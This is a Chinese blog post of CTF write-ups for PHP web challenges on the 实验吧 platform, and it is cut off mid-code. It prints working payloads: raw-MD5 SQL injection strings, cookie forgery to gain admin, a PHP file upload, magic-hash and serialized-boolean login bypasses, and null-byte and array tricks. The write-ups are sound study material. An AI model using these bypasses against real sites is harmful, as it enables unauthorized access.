<!DOCTYPE html>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
  <title>
    实验吧 wp | 道萝岗特森&#39;s Blog
  </title>
  <meta name="description" content="hello world">
  
  <meta name="keywords" content="
  writeup
  ">
  
  <meta name="author" content="daolgts">

  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">
  <meta name="theme-color" content="#1e2327">
  <link rel="apple-touch-icon" href="https://github.githubassets.com/apple-touch-icon.png">
  <link rel="apple-touch-icon" sizes="180x180" href="https://github.githubassets.com/apple-touch-icon-180x180.png">

  <link rel="icon" type="image/x-icon" href="/images/xixi.png">
  <link rel="stylesheet" href="/css/main.css">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
  

  
<script>
  var _hmt = _hmt || [];
  (function(){var hm = document.createElement("script");
    hm.src = "//hm.baidu.com/hm.js?a868b3c37552464bd253d45da4b33ddf";
    var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm, s);})();
</script>


  <script src="//cdnjs.cloudflare.com/ajax/libs/vue/1.0.25-csp/vue.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.11.2/moment.min.js"></script>
</head>

<body id="replica-app">

<nav class="navbar-wrapper">
  <div class="navbar">
    <div class="container clearfix">
      <a href="/" class="navbar-logo"><i class="fa fa-github"></i></a>

      <div class="navbar-search float-left desktop-only">
        <div class="navbar-search-form">
          <label for="gsc-i-id1">This website</label>
          <div id="google-search">
            <gcse:search></gcse:search>
          </div>
        </div>
      </div>

      <ul class="navbar-nav float-left">
        
        <li><a href="/archives">Archives</a></li>
        
        <!--  -->
        
        <li><a href="/tags">Tags</a></li>
        
        
          <li><a href="/links">Links</a></li>
        
        
          <li><a href="/about">About</a></li>
        
        
      </ul>

      <ul class="navbar-nav user-nav float-right desktop-only">
        <li class="user-nav-notification">
          <a><span class="user-nav-unread"></span><i class="fa fa-bell"></i></a>
        </li>
        <li>
          <a><i class="fa fa-plus"></i> <i class="fa fa-caret-down"></i></a>
        </li>
        <li class="user-nav-logo">
          <a><img src="/images/avatar.png"> <i class="fa fa-caret-down"></i></i></a>
        </li>
      </ul>
    </div>
  </div>
</nav>

<div class="main-container">
  <header class="header-wrapper desktop-only">
  <div class="container header-site-detail">
    <ul class="header-toolbar">
      <li class="clearfix">
        <a href="/archives" class="header-toolbar-left"><i
                  class="fa fa-file-text"></i> Posts </a>
        <a href="/archives"
           class="header-toolbar-right"> 37 </a>
      </li>
      <li>
        <a href="/tags" class="header-toolbar-left"><i
                  class="fa fa-tags"></i> Tags </a>
        <a href="/tags"
           class="header-toolbar-right"> 18 </a>
      </li>
      <li>
        <a href="/categories" class="header-toolbar-left"><i
                  class="fa fa-folder-open"></i> Categories </a>
        <a href="/categories"
           class="header-toolbar-right"> 0 </a>
      </li>
    </ul>
    <h2 class="header-title">
      <i class="fa fa-book text-muted"></i>
      <a href="/">道萝岗特森&#39;s Blog</a>
      
      
    </h2>
  </div>

  <div class="container">
    <div class="header-tab-wrapper clearfix">
      <span class="header-tab header-tab-selected"><i class="fa fa-thumbs-o-up"></i> Like</span>
      <span class="header-tab"><i class="fa fa-share-alt"></i> Share</span>
      <span class="header-tab"><i class="fa fa-comments-o"></i> Discussion</span>
      <span class="header-tab"><i class="fa fa-bookmark-o"></i> Bookmark </span>
      <span class="header-tab"><i class="fa fa-smile-o"></i> Smile <i class="fa fa-caret-down"></i></span>
    </div>
  </div>
</header>


<div class="post-container container">
  <h3>
    <i class="fa fa-user-o"></i>
    daolgts

    <span class="post-date float-right" title="{{moment(1517646231000).format('MMM DD, YYYY, h:mm:ss A')}}">
      <i class="fa fa-pencil-square-o"></i>
      {{moment(1517646231000).fromNow()}}
    </span>
  </h3>

  <article class="post-content">
    <h1>实验吧 wp</h1>
    <a id="more"></a>
<h2 id="实验吧-后台登陆"><a href="#实验吧-后台登陆" class="headerlink" title="实验吧 后台登陆"></a>实验吧 后台登陆</h2><ul>
<li><p><a href="http://www.shiyanbar.com/ctf/2036" target="_blank" rel="noopener">http://www.shiyanbar.com/ctf/2036</a></p>
</li>
<li><p>题目链接 <a href="http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php</a></p>
</li>
<li><p>页面源代码中有提示</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- $password=$_POST[&apos;password&apos;];</span><br><span class="line">$sql = &quot;SELECT * FROM admin WHERE username = &apos;admin&apos; and password = &apos;&quot;.md5($password,true).&quot;&apos;&quot;;</span><br><span class="line">$result=mysqli_query($link,$sql);</span><br><span class="line">	if(mysqli_num_rows($result)&gt;0)&#123;</span><br><span class="line">		echo &apos;flag is :&apos;.$flag;</span><br><span class="line">	&#125;</span><br><span class="line">	else&#123;</span><br><span class="line">		echo &apos;密码错误!&apos;;</span><br><span class="line">	&#125; --&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>md5(string,raw)</p>
<p>  string 必需。规定要计算的字符串。</p>
<p>  raw 可选。规定十六进制或二进制输出格式：</p>
<p>  TRUE – 原始 16 字符二进制格式<br>  FALSE – 默认。32 字符</p>
<p>  十六进制数如果md5计算后的值经过hex转成字符串后为 ”or’xxx’这样的字符串，则拼接后构成的语句为：</p>
<pre><code>select * from &apos;admin&apos; where password=”or’xxx’</code></pre></li>
<li><p>下面提供两个payload：</p>
<p>  content: 129581926211651571912466741651878684928</p>
<p>  hex: 06da5430449f8f6f23dfc1276f722738</p>
<p>  raw: ?T0D??o#??’or’8.N=?</p>
<p>  content: ffifdyop</p>
<p>  hex: 276f722736c95d99e921722cf9ed621c</p>
<p>  raw: ‘or’6蒥欓!r,b</p>
</li>
</ul>
<h2 id="实验吧-你真的会PHP吗"><a href="#实验吧-你真的会PHP吗" class="headerlink" title="实验吧 你真的会PHP吗"></a>实验吧 你真的会PHP吗</h2><ul>
<li><p><a href="http://www.shiyanbar.com/ctf/2008" target="_blank" rel="noopener">http://www.shiyanbar.com/ctf/2008</a></p>
</li>
<li><p>解题链接： <a href="http://ctf5.shiyanbar.com/web/PHP/index.php" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/web/PHP/index.php</a></p>
</li>
<li><p>burp suite抓包，response下发现有hint<img src="https://s1.ax1x.com/2018/01/26/pqyEsx.png" alt="pqyEsx.png"></p>
</li>
<li><p>访问ctf5.shiyanbar.com/web/PHP/6c525af4059b4fe7d8c33a.txt得到源代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$info = &quot;&quot;;</span><br><span class="line">$req = [];</span><br><span class="line">$flag=&quot;xxxxxxxxxx&quot;;</span><br><span class="line"></span><br><span class="line">ini_set(&quot;display_error&quot;, false);</span><br><span class="line">error_reporting(0);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if(!isset($_POST[&apos;number&apos;]))&#123;</span><br><span class="line">   header(&quot;hint:6c525af4059b4fe7d8c33a.txt&quot;);</span><br><span class="line"></span><br><span class="line">   die(&quot;have a fun!!&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">foreach([$_POST] as $global_var) &#123;</span><br><span class="line">    foreach($global_var as $key =&gt; $value) &#123;</span><br><span class="line">        $value = trim($value);</span><br><span class="line">        is_string($value) &amp;&amp; $req[$key] = addslashes($value);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">function is_palindrome_number($number) &#123;</span><br><span class="line">    $number = strval($number);</span><br><span class="line">    $i = 0;</span><br><span class="line">    $j = strlen($number) - 1;</span><br><span class="line">    while($i &lt; $j) &#123;</span><br><span class="line">        if($number[$i] !== $number[$j]) &#123;</span><br><span class="line">            return false;</span><br><span class="line">        &#125;</span><br><span class="line">        $i++;</span><br><span class="line">        $j--;</span><br><span class="line">    &#125;</span><br><span class="line">    return true;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if(is_numeric($_REQUEST[&apos;number&apos;]))&#123;</span><br><span class="line"></span><br><span class="line">   $info=&quot;sorry, you cann&apos;t input a number!&quot;;</span><br><span class="line"></span><br><span class="line">&#125;elseif($req[&apos;number&apos;]!=strval(intval($req[&apos;number&apos;])))&#123;</span><br><span class="line"></span><br><span class="line">     $info = &quot;number must be equal to it&apos;s integer!! &quot;;</span><br><span class="line"></span><br><span class="line">&#125;else&#123;</span><br><span class="line"></span><br><span class="line">     $value1 = intval($req[&quot;number&quot;]);</span><br><span class="line">     $value2 = intval(strrev($req[&quot;number&quot;]));</span><br><span class="line"></span><br><span class="line">     if($value1!=$value2)&#123;</span><br><span class="line">          $info=&quot;no, this is not a palindrome number!&quot;;</span><br><span class="line">     &#125;else&#123;</span><br><span class="line"></span><br><span class="line">          if(is_palindrome_number($req[&quot;number&quot;]))&#123;</span><br><span class="line">              $info = &quot;nice! &#123;$value1&#125; is a palindrome number!&quot;;</span><br><span class="line">          &#125;else&#123;</span><br><span class="line">             $info=$flag;</span><br><span class="line">          &#125;</span><br><span class="line">     &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">echo $info;</span><br></pre></td></tr></table></figure>
</li>
<li><p>要拿到flag，POST的number需要满足以下条件：</p>
<ol>
<li><p>不为空，且不能是一个数值型数字，包括小数。(由is_numeric函数判断)</p>
</li>
<li><p>不能是一个回文数。（is_palindrome_number判断）</p>
</li>
<li><p>该数的反转的整数值应该和它本身的整数值相等。即：</p>
<p> intval($req[“number”])=intval(strrev($req[“number”]))</p>
<h5 id="1-php-intval-函数溢出"><a href="#1-php-intval-函数溢出" class="headerlink" title="1.  php intval()函数溢出"></a>1.  php intval()函数溢出</h5></li>
</ol>
</li>
<li><ol>
<li>获取变量的整数值，允许以使用特定的进制返回,默认10进制</li>
</ol>
</li>
<li><ol start="2">
<li>Intval最大的值取决于操作系统。 32 位系统最大带符号的 integer 范围是 -2147483648 到 2147483647<br> 举例，在这样的系统上， intval(‘1000000000000’) 会返回 2147483647。64位系统上，最大带符号的 integer 值是 9223372036854775807。</li>
</ol>
</li>
<li><p>空字符可以绕过is_numeric的判断（如%00,%20）</p>
</li>
<li><p>构造以下poc，number=2147483647%00 和number=2147483647%20都可</p>
<h5 id="2-用科学计数法构造0-0"><a href="#2-用科学计数法构造0-0" class="headerlink" title="2. 用科学计数法构造0=0"></a>2. 用科学计数法构造0=0</h5><p>要求不能为回文数，但又要满足intval($req[“number”])=intval(strrev($req[“number”]))，所以我们采用科学计数法构造poc为number=0e-0%00，这样的话我们就可以绕过。</p>
</li>
</ul>
<h2 id="who-are-you"><a href="#who-are-you" class="headerlink" title="who are you"></a>who are you</h2><ul>
<li>打开只有一句“Sorry. You have no permissions.” 页面源码没有提示</li>
<li>burpsuite抓包发现了“Cookie: role=Zjo1OiJ0aHJmZyI7”，base64解码得到</li>
<li>f:5:”thrfg”;</li>
<li>thrfg是rot-13加密，解密后是guest，改为admin后，再用rot13加密，得到</li>
<li>f:5:”nqzva”;</li>
<li>base64编码得到Zjo1OiJucXp2YSI7，修改为新的cookie</li>
<li>页面显示Hello admin, now you can upload something you are easy to forget.</li>
<li>查看页面源代码，有提示</li>
<li><!-- $filename = $_POST['filename']; $data = $_POST['data']; --></li>
<li>通过构造上传php<br><img src="https://s1.ax1x.com/2018/01/26/pqfLr9.png" alt="pqfLr9.png"><br><img src="https://s1.ax1x.com/2018/01/26/pqfObR.png" alt="pqfObR.png"></li>
<li>访问 <a href="http://106.75.72.168:2222/uploads/b864978447b0dfa9a52a5586a02daefe1.php得到flag" target="_blank" rel="noopener">http://106.75.72.168:2222/uploads/b864978447b0dfa9a52a5586a02daefe1.php得到flag</a></li>
</ul>
<p>这星期看了看html，php，js的内容，题目里的代码能看懂些了，sql语句还是不太会</p>
<hr>
<h2 id="实验吧-Forms"><a href="#实验吧-Forms" class="headerlink" title="实验吧 Forms"></a>实验吧 Forms</h2><ul>
<li>解题链接： <a href="http://ctf5.shiyanbar.com/10/main.php" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/10/main.php</a></li>
<li>点进去页面显示<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Notice: Undefined index: PIN in C:\h43a1W3\phpstudy\WWW\10\main.php on line 11</span><br><span class="line">Notice: Undefined index: showsource in C:\h43a1W3\phpstudy\WWW\10\main.php on line 12</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>下面有个提交PIN码的框，点击提交</p>
<ul>
<li><p>burpsuite拦截一下</p>
</li>
<li><p>发现有个showsource为0，改成1试试</p>
</li>
<li><p><img src="https://s1.ax1x.com/2018/01/28/pvYJ4s.png" alt="pvYJ4s.png"></p>
</li>
<li><p>显示了部分源码，也就得到了PIN码</p>
</li>
<li><p><img src="https://s1.ax1x.com/2018/01/28/pvYGNj.png" alt="pvYGNj.png"></p>
</li>
<li><p>输入正确的PIN码，得到flag</p>
</li>
</ul>
<h2 id="实验吧-天网管理系统"><a href="#实验吧-天网管理系统" class="headerlink" title="实验吧 天网管理系统"></a>实验吧 天网管理系统</h2><ul>
<li><p>解题链接： <a href="http://ctf5.shiyanbar.com/10/web1/" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/10/web1/</a></p>
</li>
<li><p>emmm<br><img src="https://s1.ax1x.com/2018/01/28/pvwXMn.png" alt="pvwXMn.png"></p>
</li>
<li><p>查看页面源代码，有提示</p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- $test=$_GET[&apos;username&apos;]; $test=md5($test); if($test==&apos;0&apos;) --&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>username经过md5加密后要等于0</p>
</li>
<li><p>　在某些情况下，PHP会把类数值数据（如含有数字的字符串等）转换成数值处理，== 运算符就是其中之一。在使用 == 运算符对两个字符串进行松散比较时，PHP会把类数值的字符串转换为数值进行比较，如果参数是字符串，则返回字符串中第一个不是数字的字符之前的数字串所代表的整数值。比如: ‘3’ == ‘3ascasd’结果为true。</p>
</li>
<li><p>　==来进行hash比较，如果hash值以0e开头，后边都是数字，再与数字比较，就会被解释成0*10^n还是为0，就会被判断相等</p>
</li>
<li><p>　s1091221200a,s878926199a、240610708、QNKCDZO、aabg7XSs、aabC9RqS就可以</p>
</li>
<li><p>然后得到提示</p>
</li>
<li><p>/user.php?fame=hjkleffifer</p>
</li>
<li><p>打开提示的页面</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$unserialize_str = $_POST[&apos;password&apos;];</span><br><span class="line">$data_unserialize = unserialize($unserialize_str);</span><br><span class="line">if($data_unserialize[&apos;user&apos;] == &apos;???&apos; &amp;&amp; $data_unserialize[&apos;pass&apos;]==&apos;???&apos;) &#123; print_r($flag); &#125;</span><br><span class="line">伟大的科学家php方言道：成也布尔，败也布尔。 回去吧骚年</span><br></pre></td></tr></table></figure>
</li>
<li><p>代码意思是把post提交的password值经过”反序列化”得到一个数组，要求数组里的user和pass都等于某个值时就打印flag</p>
</li>
<li><p>但是我们不知道两处???到底是什么，因此无法考虑用php函数构造这样的值</p>
</li>
<li><p>提示布尔，bool类型的true跟任意字符串可以弱类型相等</p>
</li>
<li><p>因此我们可以构造bool类型的序列化数据，无论比较的值是什么，结果都为true。（a代表array，s代表string，b代表bool，而数字代表个数/长度）</p>
</li>
<li><p>构造password值为： a:2:{s:4:”user”;b:1;s:4:”pass”;b:1;}</p>
</li>
<li><p>登陆得到flag</p>
</li>
</ul>
<h2 id="实验吧-once-more"><a href="#实验吧-once-more" class="headerlink" title="实验吧 once more"></a>实验吧 once more</h2><ul>
<li><p>解题链接： <a href="http://ctf5.shiyanbar.com/web/more.php" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/web/more.php</a></p>
</li>
<li><p>代码审计题，给出了源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if (isset ($_GET[&apos;password&apos;])) &#123;</span><br><span class="line">	if (ereg (&quot;^[a-zA-Z0-9]+$&quot;, $_GET[&apos;password&apos;]) === FALSE)</span><br><span class="line">	&#123;</span><br><span class="line">		echo &apos;&lt;p&gt;You password must be alphanumeric&lt;/p&gt;&apos;;</span><br><span class="line">	&#125;</span><br><span class="line">	else if (strlen($_GET[&apos;password&apos;]) &lt; 8 &amp;&amp; $_GET[&apos;password&apos;] &gt; 9999999)</span><br><span class="line">	&#123;</span><br><span class="line">		if (strpos ($_GET[&apos;password&apos;], &apos;*-*&apos;) !== FALSE)</span><br><span class="line">		&#123;</span><br><span class="line">			die(&apos;Flag: &apos; . $flag);</span><br><span class="line">		&#125;</span><br><span class="line">		else</span><br><span class="line">		&#123;</span><br><span class="line">			echo(&apos;&lt;p&gt;*-* have not been found&lt;/p&gt;&apos;);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	else</span><br><span class="line">	&#123;</span><br><span class="line">		echo &apos;&lt;p&gt;Invalid password&lt;/p&gt;&apos;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>条件1：</p>
</li>
<li><p>ereg (“^[a-zA-Z0-9]+$”, $_GET[‘password’]) ！== FALSE<br>password由字母数字组成</p>
</li>
<li><p>条件2：</p>
</li>
<li><p>strlen($_GET[‘password’]) &lt; 8 &amp;&amp; $_GET[‘password’] &gt; 9999999<br>password长度小于8，数值大于9999999</p>
</li>
<li><p>条件3：</p>
</li>
<li><p>strpos ($_GET[‘password’], ‘<em>-</em>‘) !== FALSE<br>password中需要含有特殊字符：*- *</p>
</li>
<li><p>ereg漏洞：ereg读%00的时候，就截止了</p>
</li>
<li><p>password=9e9%00<em>-</em>，在地址栏提交,得到flag</p>
</li>
<li><p>或者<a href="http://ctf5.shiyanbar.com/web/more.php?password[]=，password改为数组类型" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/web/more.php?password[]=，password改为数组类型</a></p>
</li>
</ul>
<h2 id="实验吧-Guess-Next-Session"><a href="#实验吧-Guess-Next-Session" class="headerlink" title="实验吧 Guess Next Session"></a>实验吧 Guess Next Session</h2><ul>
<li><p>解题链接： <a href="http://ctf5.shiyanbar.com/web/Session.php" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/web/Session.php</a></p>
<blockquote>
<p>写个算法没准就算出来了，23333<br>hint：你确定你有认真看判断条件？<br>格式：CTF{}</p>
</blockquote>
</li>
<li><p>打开链接，查看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">session_start();</span><br><span class="line">if (isset ($_GET[&apos;password&apos;])) &#123;</span><br><span class="line">    if ($_GET[&apos;password&apos;] == $_SESSION[&apos;password&apos;])</span><br><span class="line">        die (&apos;Flag: &apos;.$flag);</span><br><span class="line">    else</span><br><span class="line">        print &apos;&lt;p&gt;Wrong guess.&lt;/p&gt;&apos;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>根据代码，需要输入的password和session的值相同才会输出flag，然后是个随机算法。</p>
</li>
<li><p>burpsuite抓包</p>
</li>
<li><p><img src="https://s1.ax1x.com/2018/01/30/9CYgq1.png" alt="9CYgq1.png"></p>
</li>
<li><p>吧phpsession的值改为空，password为空，提交得到flag</p>
</li>
</ul>
<h2 id="实验吧-FALSE"><a href="#实验吧-FALSE" class="headerlink" title="实验吧 FALSE"></a>实验吧 FALSE</h2><ul>
<li><p>解题链接： <a href="http://ctf5.shiyanbar.com/web/false.php" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/web/false.php</a></p>
<blockquote>
<p>PHP代码审计<br>hint：sha1函数你有认真了解过吗？听说也有人用md5碰撞o(╯□╰)o<br>格式：CTF{}</p>
</blockquote>
</li>
<li><p>查看源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if (isset($_GET[&apos;name&apos;]) and isset($_GET[&apos;password&apos;])) &#123;</span><br><span class="line">    if ($_GET[&apos;name&apos;] == $_GET[&apos;password&apos;])</span><br><span class="line">        echo &apos;&lt;p&gt;Your password can not be your name!&lt;/p&gt;&apos;;</span><br><span class="line">    else if (sha1($_GET[&apos;name&apos;]) === sha1($_GET[&apos;password&apos;]))</span><br><span class="line">      die(&apos;Flag: &apos;.$flag);</span><br><span class="line">    else</span><br><span class="line">        echo &apos;&lt;p&gt;Invalid password.&lt;/p&gt;&apos;;</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">	echo &apos;&lt;p&gt;Login first!&lt;/p&gt;&apos;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>根据代码，name和password的值不能相同，而sha1加密之后的name和password的值又必须完全相同</p>
</li>
<li><p>name[]=1&amp;password[]=2在第一次判断时值是不同的，但在第二处判断时由于sha1()函数无法处理数组类型，将报错并返回false，if 条件成立，获得flag</p>
</li>
<li><p>（使用sha1对一个数组进行加密，返回的将是NULL，NULL===NULL，这是成立的）？</p>
</li>
</ul>
<h2 id="实验吧-拐弯抹角"><a href="#实验吧-拐弯抹角" class="headerlink" title="实验吧 拐弯抹角"></a>实验吧 拐弯抹角</h2><ul>
<li><p>解题链接： <a href="http://ctf5.shiyanbar.com/indirection/" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/indirection/</a></p>
</li>
<li><p>打开链接就给出了源码，还有注释</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">// code by SEC@USTC</span><br><span class="line"></span><br><span class="line">echo &apos;&lt;html&gt;&lt;head&gt;&lt;meta http-equiv=&quot;charset&quot; content=&quot;gbk&quot;&gt;&lt;/head&gt;&lt;body&gt;&apos;;</span><br><span class="line"></span><br><span class="line">$URL = $_SERVER[&apos;REQUEST_URI&apos;];</span><br><span class="line">//echo &apos;URL: &apos;.$URL.&apos;&lt;br/&gt;&apos;;</span><br><span class="line">$flag = &quot;CTF&#123;???&#125;&quot;;</span><br><span class="line"></span><br><span class="line">$code = str_replace($flag, &apos;CTF&#123;???&#125;&apos;, file_get_contents(&apos;./index.php&apos;));</span><br><span class="line">$stop = 0;</span><br><span class="line"></span><br><span class="line">//这道题目本身也有教学的目的</span><br><span class="line">//第一，我们可以构造 /indirection/a/../ /indirection/./ 等等这一类的</span><br><span class="line">//所以，第一个要求就是不得出现 ./</span><br><span class="line">if($flag &amp;&amp; strpos($URL, &apos;./&apos;) !== FALSE)&#123;</span><br><span class="line">    $flag = &quot;&quot;;</span><br><span class="line">    $stop = 1;        //Pass</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//第二，我们可以构造 \ 来代替被过滤的 /</span><br><span class="line">//所以，第二个要求就是不得出现 ../</span><br><span class="line">if($flag &amp;&amp; strpos($URL, &apos;\\&apos;) !== FALSE)&#123;</span><br><span class="line">    $flag = &quot;&quot;;</span><br><span class="line">    $stop = 2;        //Pass</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//第三，有的系统大小写通用，例如 indirectioN/</span><br><span class="line">//你也可以用?和#等等的字符绕过，这需要统一解决</span><br><span class="line">//所以，第三个要求对可以用的字符做了限制，a-z / 和 .</span><br><span class="line">$matches = array();</span><br><span class="line">preg_match(&apos;/^([0-9a-z\/.]+)$/&apos;, $URL, $matches);</span><br><span class="line">if($flag &amp;&amp; empty($matches) || $matches[1] != $URL)&#123;</span><br><span class="line">    $flag = &quot;&quot;;</span><br><span class="line">    $stop = 3;        //Pass</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//第四，多个 / 也是可以的</span><br><span class="line">//所以，第四个要求是不得出现 //</span><br><span class="line">if($flag &amp;&amp; strpos($URL, &apos;//&apos;) !== FALSE)&#123;</span><br><span class="line">    $flag = &quot;&quot;;</span><br><span class="line">    $stop = 4;        //Pass</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//第五，显然加上index.php或者减去index.php都是可以的</span><br><span class="line">//所以我们下一个要求就是必须包含/index.php，并且以此结尾</span><br><span class="line">if($flag &amp;&amp; substr($URL, -10) !== &apos;/index.php&apos;)&#123;</span><br><span class="line">    $flag = &quot;&quot;;</span><br><span class="line">    $stop = 5;        //Not Pass</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//第六，我们知道在index.php后面加.也是可以的</span><br><span class="line">//所以我们禁止p后面出现.这个符号</span><br><span class="line">if($flag &amp;&amp; strpos($URL, 